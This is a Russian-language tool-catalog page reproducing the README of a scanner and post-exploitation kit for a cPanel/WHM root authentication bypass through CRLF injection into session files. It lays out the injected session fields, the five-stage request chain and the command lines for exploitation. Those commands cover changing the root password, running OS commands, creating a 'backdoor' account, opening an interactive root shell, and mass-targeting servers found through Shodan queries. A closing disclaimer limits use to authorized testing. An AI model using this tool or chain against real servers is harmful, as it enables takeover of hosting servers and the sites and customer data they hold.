Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Automated-scanner-CVE-2026-41940 — Автоматизированный сканер и инструментарий для пост-эксплуатации для CVE-2026-41940 — обход аутентификации root через cPanel и WHM с помощью CRLF-инъекции в session-файл | Kitploit
Инструменты/GitHubGitHub/sardine-web/automated-scanner-cve-2026-41940
Аутентификация и авторизацияРазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииПост-эксплуатацияТестирование на ПроникновениеКомандование и Управление

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Red Teaming
Разработка Полезной Нагрузки
GitHubsardine-web/automated-scanner-cve-2026-41940

Automated-scanner-CVE-2026-41940

Автоматизированный сканер и инструментарий для пост-эксплуатации для CVE-2026-41940 — обход аутентификации root через cPanel и WHM с помощью CRLF-инъекции в session-файл

Репозиторий
163 месяцев назадЕщё не проверено
Поделиться

CPANEL CVE EXPLOIT

English | فارسی (Persian)

root@kitploit:~
 ██████╗██████╗  █████╗ ███╗   ██╗███████╗██╗
██╔════╝██╔══██╗██╔══██╗████╗  ██║██╔════╝██║
██║     ██████╔╝███████║██╔██╗ ██║█████╗  ██║
██║     ██╔═══╝ ██╔══██║██║╚██╗██║██╔══╝  ██║
╚██████╗██║     ██║  ██║██║ ╚████║███████╗███████╗
 ╚═════╝╚═╝     ╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝╚══════╝

 ██████╗██╗   ██╗███████╗
██╔════╝██║   ██║██╔════╝
██║     ██║   ██║█████╗
██║     ╚██╗ ██╔╝██╔══╝
╚██████╗ ╚████╔╝ ███████╗
 ╚═════╝  ╚═══╝  ╚══════╝

███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
█████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║
██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║
███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║
╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝

Python CVE CVSS License Stdlib

Автоматизированный сканер и набор инструментов для пост-эксплуатации уязвимости CVE-2026-41940 — обход аутентификации root в cPanel и WHM через CRLF-инъекцию в файле сессии.


Содержание

  • Обзор
  • Детали CVE
  • Принцип работы
  • Возможности
  • Затронутые версии
  • Требования
  • Установка
  • Быстрый старт
  • Использование
  • Действия после эксплуатации
  • Интерактивная оболочка WHM
  • Массовое сканирование и интеграция в конвейеры
  • Поисковые запросы Shodan
  • Формат вывода
  • Пример сессии
  • Правовое предупреждение

Обзор

CPANEL CVE EXPLOIT — это однофайловый инструмент на Python, предназначенный для авторизованных тестов безопасности серверов cPanel и WHM, уязвимых для CVE-2026-41940.

Уязвимость позволяет неаутентифицированному удалённому злоумышленнику отравить файлы сессий WHM через CRLF-инъекцию в заголовке Authorization: Basic, обходя аутентификацию и получая доступ к WHM с правами root без действительных учётных данных.


Детали CVE

Корневая причина

В уязвимых версиях cPanel и WHM функция saveSession() в Session.pm вызывает filter_sessiondata() после записи файла сессии на диск. Злоумышленник может внедрить символы CRLF (\r\n) через HTTP-заголовок Authorization: Basic, которые записываются непосредственно в файл сессии на диске — минуя санитизацию.

Внедрённые поля сессии

Инструмент использует полезную нагрузку в кодировке Base64, которая декодируется в:

root@kitploit:~
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

Эти поля имитируют полностью аутентифицированную сессию root в WHM, включая обход 2FA (tfa_verified=1) и флаг привилегий root (hasroot=1).

Исправление

Компания cPanel переместила вызов filter_sessiondata() так, чтобы он выполнялся до операции записи сессии в Session.pm.


Принцип работы

Цепочка эксплуатации состоит из 5 этапов (этапы 0–4):

root@kitploit:~
flowchart TD
    A[Этап 0: Обнаружение канонического хоста] --> B[Этап 1: Получение предварительной сессии]
    B --> C[Этап 2: CRLF-инъекция через заголовок Authorization]
    C --> D[Этап 3: Распространение сессии через do_token_denied]
    D --> E[Этап 4: Подтверждение доступа root через json-api/version]
    E --> F{Уязвим?}
    F -->|Да| G[Пост-эксплуатационные действия / Интерактивная оболочка]
    F -->|Нет| H[Пропустить цель]

    A -.- A1["GET /openid_connect/cpanelid → редирект 307 раскрывает реальное имя хоста"]
    B -.- B1["POST /login/?login_only=1 → кука whostmgrsession"]
    C -.- C1["GET / + отравленный Basic auth → токен /cpsessXXXXXXXXXX"]
    D -.- D1["GET /scripts2/listaccts → сброс сырой сессии в кеш"]
    E -.- E1["GET /cpsessXXX/json-api/version → HTTP 200 + версия в JSON"]

Возможности


Затронутые версии

Примечание: Цели, работающие на исправленных сборках, автоматически отмечаются и пропускаются при сканировании.


Требования

Основные (обязательные)

  • Python 3.8+
  • Нет внешних пакетов — используется только стандартная библиотека Python

Опционально

ПакетНазначение
seleniumАвтоматический вход в браузер (--selenium)
Chrome / FirefoxДвижок браузера для Selenium
root@kitploit:~
pip install -r requirements.txt   # опционально — только selenium

Установка

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/cpanel-cve-exploit.git
cd cpanel-cve-exploit

Этап сборки не требуется. Запускайте напрямую:

root@kitploit:~
python3 test-cve.py --help

Быстрый старт

root@kitploit:~
# Сканирование одной цели WHM
python3 test-cve.py -u https://target.com:2087

# Сканирование с пост-эксплуатацией: список всех аккаунтов cPanel
python3 test-cve.py -u https://target.com:2087 --action list

# Массовое сканирование из файла, 20 потоков, сохранение JSON-отчёта
python3 test-cve.py -l targets.txt -t 20 -o results.json

Использование

root@kitploit:~
usage: test-cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                   [-t THREADS] [--timeout TIMEOUT] [--rate-limit RATE_LIMIT]
                   [--action {list,passwd,cmd,exec,info,version,shell,adduser}]
                   [--passwd PASSWD] [--cmd CMD]
                   [--new-user NEW_USER] [--new-domain NEW_DOMAIN]
                   [--read-file READ_FILE] [--selenium]
                   [--engine {chrome,firefox}] [--browser] [--check-rce]
                   [-o OUTPUT] [--no-color]

Параметры цели

ФлагОписание
-u,

Параметры сканирования

Параметры вывода

ФлагОписание
-o, --outputСохранить результаты в JSON-файл
--no-colorОтключить ANSI-цвета в выводе

Действия после эксплуатации

Флаги пост-эксплуатации работают только с одной целью (-u, не с массовым сканированием).

Примеры

root@kitploit:~
# Смена пароля root после обхода
python3 test-cve.py -u https://target.com:2087 --action passwd --passwd 'P@ss2026!'

# Выполнение удалённой команды
python3 test-cve.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"

# Создание backdoor-аккаунта cPanel
python3 test-cve.py -u https://target.com:2087 \
  --action adduser --new-user backdoor --new-domain evil.com --passwd 'TempPass2026!'

# Открыть интерактивную оболочку WHM
python3 test-cve.py -u https://target.com:2087 --action shell

# Автоматический вход через Chrome
python3 test-cve.py -u https://target.com:2087 --selenium --engine chrome

# Ручной вход в браузере (выводит JS для консоли DevTools)
python3 test-cve.py -u https://target.com:2087 --browser

Интерактивная оболочка WHM

Запускается с --action shell для полноценной интерактивной сессии:

root@kitploit:~
[email protected] ▶ help

  id / whoami / hostname / version  → информация о сервере
  ls [путь]                         → список файлов
  cat [путь]                        → чтение содержимого файла
  accounts                          → список аккаунтов cPanel
  addadmin <пользователь> <пароль>  → создать администратора/реселлера WHM
  passwd <новый пароль>             → смена пароля root
  exec <команда>                    → выполнение команды ОС
  exit / quit                       → выход из оболочки

Пример:

root@kitploit:~
[email protected] ▶ id
  uid=0(root) gid=0(root) groups=0(root)

[email protected] ▶ accounts
  user=webuser1          domain=example.com          [email protected]
  user=webuser2          domain=test.com             [email protected]

[email protected] ▶ cat /etc/passwd

[email protected] ▶ exit

Массовое сканирование и интеграция в конвейеры

Из файла

root@kitploit:~
python3 test-cve.py -l targets.txt -t 20 -o results.json

Из stdin (конвейер)

root@kitploit:~
cat urls.txt | python3 test-cve.py

# Конвейер subfinder + httpx
subfinder -d example.com -silent | httpx -p 2087 -silent | python3 test-cve.py -t 30

# Конвейер Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | python3 test-cve.py -t 30 -o shodan_results.json

Поддерживаемые форматы ввода

ФорматПример
Полный URLhttps://192.168.1.1:2087
IP + порт192.168.1.1 2087
Вывод ShodanАвтоматически разбирается через regex
ANSI-цветной выводАвтоматически очищается

Поисковые запросы Shodan

root@kitploit:~
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
http.title:"WHM"
ssl:"cpanel" port:2087

Формат вывода

Результаты сохраняются в JSON при использовании -o results.json:

root@kitploit:~
{
  "scanner": "cPanelSniper v2.0",
  "cve": "CVE-2026-41940",
  "timestamp": "2026-05-23T12:00:00.000000",
  "findings": [
    {
      "severity": "CRIT",
      "title": "CVE-2026-41940 — cPanel & WHM Authentication Bypass",
      "target": "https://target.com:2087",
      "canonical": "server.target.com",
      "session": "root:SessionName",
      "token": "/cpsess1234567890",
      "version": "11.126.0.50",
      "api_url": "https://target.com:2087/cpsess1234567890/json-api/version",
      "evidence": "{\"version\":\"11.126.0.50\"...}",
      "cve": "CVE-2026-41940",
      "cvss": "10.0",
      "timestamp": "2026-05-23T12:00:05.000000"
    }
  ]
}

Сводка в консоли

root@kitploit:~
══════════════════════════════════════════════════════════════════════
  cPanelSniper — Сканирование CVE-2026-41940 завершено
  Время: 12.4с  ·  Целей: 50
──────────────────────────────────────────────────────────────────────

  ⚡ 2 УЯЗВИМЫХ ЦЕЛИ(ЕЙ)

  Цель    : https://victim1.com:2087
  Версия  : 11.126.0.50
  Токен   : /cpsess1234567890
  URL API : https://victim1.com:2087/cpsess1234567890/json-api/version
  Док-во  : {"version":"11.126.0.50"...}

══════════════════════════════════════════════════════════════════════

Пример сессии

root@kitploit:~
$ python3 test-cve.py -u https://target.com:2087

  Конфигурация:
   Целей    : 1
   Потоков  : 10
   Тайм-аут : 15с
   Действие : только сканирование

12:00:01 [INFO] Обнаружено каноническое имя хоста: server.target.com
12:00:02 [  OK] Этап1: предварительная сессия = root:abc123...
12:00:03 [  OK] Этап2: HTTP 307 → токен=/cpsess1234567890
12:00:04 [  OK] Этап3: HTTP 401 — механизм do_token_denied сработал
12:00:05 [INFO] Этап4: HTTP 200  {"version":"11.126.0.50"...}
12:00:05 [PWND] CVE-2026-41940 ПОДТВЕРЖДЕНА — доступ к WHM с правами root! (v11.126.0.50 — ПОДТВЕРЖДЕНА уязвимость)
12:00:05 [PWND]   Токен    : /cpsess1234567890
12:00:05 [PWND]   Сессия   : root:abc123...
12:00:05 [PWND]   Версия   : 11.126.0.50
12:00:05 [PWND]   URL API  : https://target.com:2087/cpsess1234567890/json-api/version

Структура проекта

root@kitploit:~
cpanel-cve-exploit/
├── test-cve.py        # Основной сканер и инструмент эксплуатации (один файл)
├── requirements.txt   # Опционально: selenium
├── README.md          # Документация на английском
└── README.fa.md       # Документация на персидском (فارسی)

Правовое предупреждение

ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ

Этот инструмент предоставляется только для образовательных и авторизованных целей пентеста.

  • Используйте только против систем, которые вам принадлежат или на тестирование которых у вас есть явное письменное разрешение.
  • Несанкционированный доступ к компьютерным системам является незаконным в соответствии с законами, включая CFAA (США), Computer Misuse Act (Великобритания) и эквивалентным законодательством по всему миру.
  • Эксплуатация CVE-2026-41940 в реальных условиях подтверждена — немедленно установите исправления на затронутых системах.
  • Авторы и участники не несут ответственности за неправомерное использование этого программного обеспечения.

Используя этот инструмент, вы соглашаетесь использовать его ответственно и в соответствии со всеми применимыми законами.


Ссылки

  • CVE-2026-41940 — запись в NVD
  • Оповещение о безопасности cPanel — исправление CRLF-инъекции в Session.pm
  • Порт WHM по умолчанию: 2087 (HTTPS)

Создано для исследователей безопасности · Используйте ответственно

Скачать инструмент
СвойствоЗначение
CVECVE-2026-41940
СерьёзностьКритическая
CVSS10.0
Вектор атакиСеть / без аутентификации
ВлияниеПолный доступ к WHM с правами root
Порт по умолчанию2087 (WHM)
СтатусПодтверждена эксплуатация в реальных условиях (апрель 2026)
ЭтапКонечная точкаНазначение
0/openid_connect/cpanelidАвтоматическое обнаружение канонического имени хоста через редирект 307
1/login/?login_only=1Получение предварительной куки whostmgrsession с неверными учётными данными
2/Инъекция заголовка Authorization: Basic, отравленного CRLF, в файл сессии
3/scripts2/listacctsЗапуск механизма do_token_denied для сброса сессии в кеш
4/{token}/json-api/versionПодтверждение доступа root — HTTP 200 с версией в JSON
ВозможностьОписание
Сканирование одной целиПолная цепочка эксплуатации по одному URL WHM
Массовое сканированиеМногопоточное сканирование из файла или stdin
Определение версииАвтоматическое сравнение исправленных и уязвимых версий
Пост-эксплуатационное APIСмена пароля, выполнение команд, список аккаунтов, создание пользователей
Интерактивная оболочкаВстроенная оболочка WHM с правами root с чтением файлов и командами API
Вход через SeleniumАвтоматическое внедрение куки сессии в Chrome/Firefox
Ручной вход в браузереJavaScript-фрагменты для консоли для ручного входа в WHM
Проверка RCEБыстрая верификация id / uname -a после обхода
Экспорт в JSONСохранение всех результатов в структурированный JSON-отчёт
Готовность к конвейерамРабота с httpx, subfinder, shodan и конвейерами awk
Только стандартная библиотекаДля базовой функциональности не требуется pip-зависимостей
Цветной выводЛогирование этапов в реальном времени с индикаторами серьёзности
ВеткаИсправлено вСтатус
11.110.x11.110.0.97Уязвимо ниже исправления
11.118.x11.118.0.63Уязвимо ниже исправления
11.126.x11.126.0.54Уязвимо ниже исправления
11.132.x11.132.0.29Уязвимо ниже исправления
11.134.x11.134.0.20Уязвимо ниже исправления
11.136.x11.136.0.5Уязвимо ниже исправления
--url
URL одной цели (например, https://host:2087)
-l, --listФайл, содержащий URL (по одному на строку)
--hostnameПереопределить канонический заголовок Host (по умолчанию определяется автоматически)
ФлагПо умолчаниюОписание
-t, --threads10Количество потоков сканирования
--timeout15Тайм-аут HTTP в секундах
--rate-limit0Задержка (в секундах) между отправками целей
ДействиеФлагОписание
Только сканирование(по умолчанию)Запустить цепочку эксплуатации и сообщить об уязвимости
Список аккаунтов--action listСписок всех аккаунтов cPanel через WHM API
Смена пароля--action passwd --passwd <пароль>Сменить пароль root в WHM
Выполнение команды--action cmd --cmd "id;whoami"Выполнить команду ОС через WHM exec API
Информация о сервере--action infoПолучить имя хоста, нагрузку, диск, версию
Получить версию--action versionПолучить версию cPanel/WHM через API
Создать аккаунт--action adduser --new-user u --new-domain d.com --passwd pСоздать новый аккаунт cPanel
Интерактивная оболочка--action shellЗапустить интерактивную оболочку WHM с правами root
Проверка RCE--check-rceВыполнить id;uname -a после успешного обхода
Вход через Selenium--selenium [--engine chrome|firefox]Автоматический вход в панель WHM в браузере
Ручной вход в браузере--browserВывести команды для консоли JavaScript для ручного входа